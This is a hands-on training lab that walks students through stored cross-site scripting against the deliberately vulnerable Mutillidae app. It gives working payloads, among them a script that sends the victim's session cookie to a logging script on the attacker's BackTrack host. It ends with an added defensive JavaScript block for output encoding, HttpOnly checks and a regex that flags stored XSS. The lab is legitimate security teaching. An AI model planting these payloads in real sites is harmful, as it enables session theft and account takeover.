OWASP Top 10 Web Hacking Final Lab 14 - Persistent Cross Site Scripting Injection #1
- On BackTrack, Open Firefox
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If the Firefox icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
- Open Mutillidae
- Notes (FYI):
- Replace 192.168.1.111 in the following URL (http://192.168.1.111/mutillidae) with your Mutillidae IP address, obtained in Section 3, Step 3.
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
- Start Apache2
- Instructions:
- service apache2 start
- service apache2 status
- ps -eaf | grep apache2 | grep -v grep
- Note(FYI):
- Start up the apache2 webserver.
- Display the status of the apache2 webserver.
- See the processes of the apache2 webserver.
Section 8. Persistent Cross Site Scripting (XSS) Example #1
- Add to your blog
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
- Basic Cross Site Scripting(XSS) Test
- Instructions:
- Place the below text in the comment box.
- <script>alert("Hello")</script>
- Click the Save Blog Entry Button
- Notes (FYI):
- This is one of the most basic vulnerability tests: it checks whether an alert popup window is displayed when the stored comment is rendered.
- View XSS Results
- Instructions:
- Click the OK Button
- Notes (FYI):
- This is a successful Cross Site Scripting(XSS) Test.
- Navigate to View Blogs
- Instructions:
- Click the View Blogs Link
- Show All Blog Entries
- Instructions:
- Select Show All
- Click the View Blog Entries Button
- View XSS Results
- Instructions:
- Click the OK Button
- Notes (FYI):
- Notice that the XSS injection from earlier was stored in the blog.
- Storing the XSS injection is what makes this type of attack persistent: it does not go away until somebody notices and protects their website.
- Reset Database
- Instructions:
- Click the Reset DB Link
- Notes (FYI):
- This link will remove the XSS Injection from the database.
- Proceed with Database Reset
- Instructions:
- Click the OK Button
Section 9. Persistent Cross Site Scripting (XSS) Example #2
- Add to your blog
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
- <iframe> Cross Site Scripting(XSS) Test
- Instructions:
- Place the below text in the comment box.
- <iframe src="http://www.cnn.com"></iframe>
- Click the Save Blog Entry Button
- Notes (FYI):
- Now we are testing whether a website can be displayed inside the blog record using the <iframe> tag.
- View <iframe> Cross Site Scripting(XSS) Results
- Instructions:
- Notice CNN is displayed in the blog.
- Notes (FYI):
- Although this is benign in nature, a malicious person could easily turn it into something harmful in a hurry.
- Reset Database
- Instructions:
- Click the Reset DB Link
- Notes (FYI):
- This link will remove the XSS Injection from the database.
- Proceed with Database Reset
- Instructions:
- Click the OK Button
Section 9. Persistent Cross Site Scripting (XSS) Example #3
- Add to your blog
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
- Inspect Element
- Instructions:
- Right Click in the Comment Box
- Click Inspect Element
- Note(FYI):
- This is not a necessary step for the injection. The goal is to let the injection attempt stay on a single line instead of being word-wrapped.
- Change Text Area Column Length
- Instructions:
- Change 65 to 95
- Click Close Button
- Cookie Harvest0r Cross Site Script (XSS) Injection
- Note(FYI):
- Replace 192.168.1.112 with your BackTrack IP Address obtained in (Section 6, Step 2).
- This JavaScript tells the web browser to send the cookies to the CGI cookie script on the BackTrack machine.
- Instructions:
- Place the below text in the comment box.
- <SCRIPT>document.location="http://192.168.1.112/cgi-bin/logit.pl?"+document.cookie</SCRIPT>
- Click the Save Blog Entry
- View Cookie Harvest0r Cross Site Script (XSS) Results
- Instructions:
- Click on the tab to create a new webpage.
- Note(FYI):
- Notice that the PHPSESSID (i.e., the document.cookie value) was sent to the BackTrack CGI script.
- Open Mutillidae
- Notes (FYI):
- Replace 192.168.1.111 in the following URL (http://192.168.1.111/mutillidae) with your Mutillidae IP address, obtained in Section 3, Step 3.
- After you click on Add to your blog, you will again be redirected to the BackTrack CGI Harvest0r script.
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
- OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
- View Cookie Harvest0r Cross Site Script (XSS) Results
- Instructions:
- Click on the tab to create a new webpage.
- Note(FYI):
- Notice that, almost immediately after you click "Add to your blog", you are redirected to BackTrack's Cookie Harvest0r script.
- This type of exploit could be far more malicious simply by toning down the verbose logging, so that the cookie information is sent under the radar.
- Reset Database
- Notes (FYI):
- Replace 192.168.1.111 in the following URL (http://192.168.1.111/mutillidae) with your Mutillidae IP address, obtained in Section 3, Step 3.
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
- Click the Reset DB Link
- Proceed with Database Reset
- Instructions:
- Click the OK Button
- On BackTrack, Start up a terminal window
- Instructions:
- Click on the Terminal Window
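Added defender-side example (not part of this lab or of Mutillidae): the two controls that stop the stored payloads used above from executing when the blog is viewed, HTML output encoding of the comment text and the HttpOnly flag on PHPSESSID, plus a small heuristic audit of stored entries. The sample entries are constructed, and the audit pattern is an assumption, not an exhaustive XSS filter.

```javascript
// Defender-side example, added here; not Mutillidae's own code.
// 1. Encode blog text on output so the browser renders it as literal text.
// 2. Mark the session cookie HttpOnly so document.cookie cannot read it.
// 3. Audit a database written by the vulnerable page for active content.

// Encode the five characters that matter in an HTML text context.
function encodeForHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Render one blog row the way the "View Blogs" page should: encoded, never raw.
function renderBlogEntry(author, comment) {
  return `<tr><td>${encodeForHtml(author)}</td><td>${encodeForHtml(comment)}</td></tr>`;
}

// Heuristic flag for stored entries that carry active content (assumed pattern,
// useful for reviewing entries saved before encoding was in place; not exhaustive).
function looksLikeStoredXss(comment) {
  return /<\s*(script|iframe|img|svg|object|embed)\b|\bon\w+\s*=|javascript:/i.test(comment);
}

// Count flagged entries in a list of { author, comment } records.
function auditEntries(entries) {
  return entries.filter((e) => looksLikeStoredXss(e.comment)).length;
}

// True when a Set-Cookie header sets PHPSESSID with HttpOnly; without that flag the
// document.cookie read used by the harvester payload above exposes the session id.
function sessionCookieIsHttpOnly(setCookieHeader) {
  const parts = setCookieHeader.split(";").map((p) => p.trim());
  return /^PHPSESSID=/.test(parts[0]) && parts.slice(1).some((a) => /^httponly$/i.test(a));
}

// Constructed sample entries mirroring the first two payloads used in the lab.
const SAMPLE_ENTRIES = [
  { author: "anonymous", comment: '<script>alert("Hello")</script>' },
  { author: "anonymous", comment: '<iframe src="http://www.cnn.com"></iframe>' },
  { author: "anonymous", comment: "just a normal blog comment" },
];

// Stand-alone demonstration: the encoded rows contain no executable markup.
for (const e of SAMPLE_ENTRIES) console.log(renderBlogEntry(e.author, e.comment));
console.log("flagged entries:", auditEntries(SAMPLE_ENTRIES));
console.log("HttpOnly set:", sessionCookieIsHttpOnly("PHPSESSID=abc123; Path=/; HttpOnly"));
```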
- Proof of Lab: Record the entire lab procedure, together with a text note bearing your name.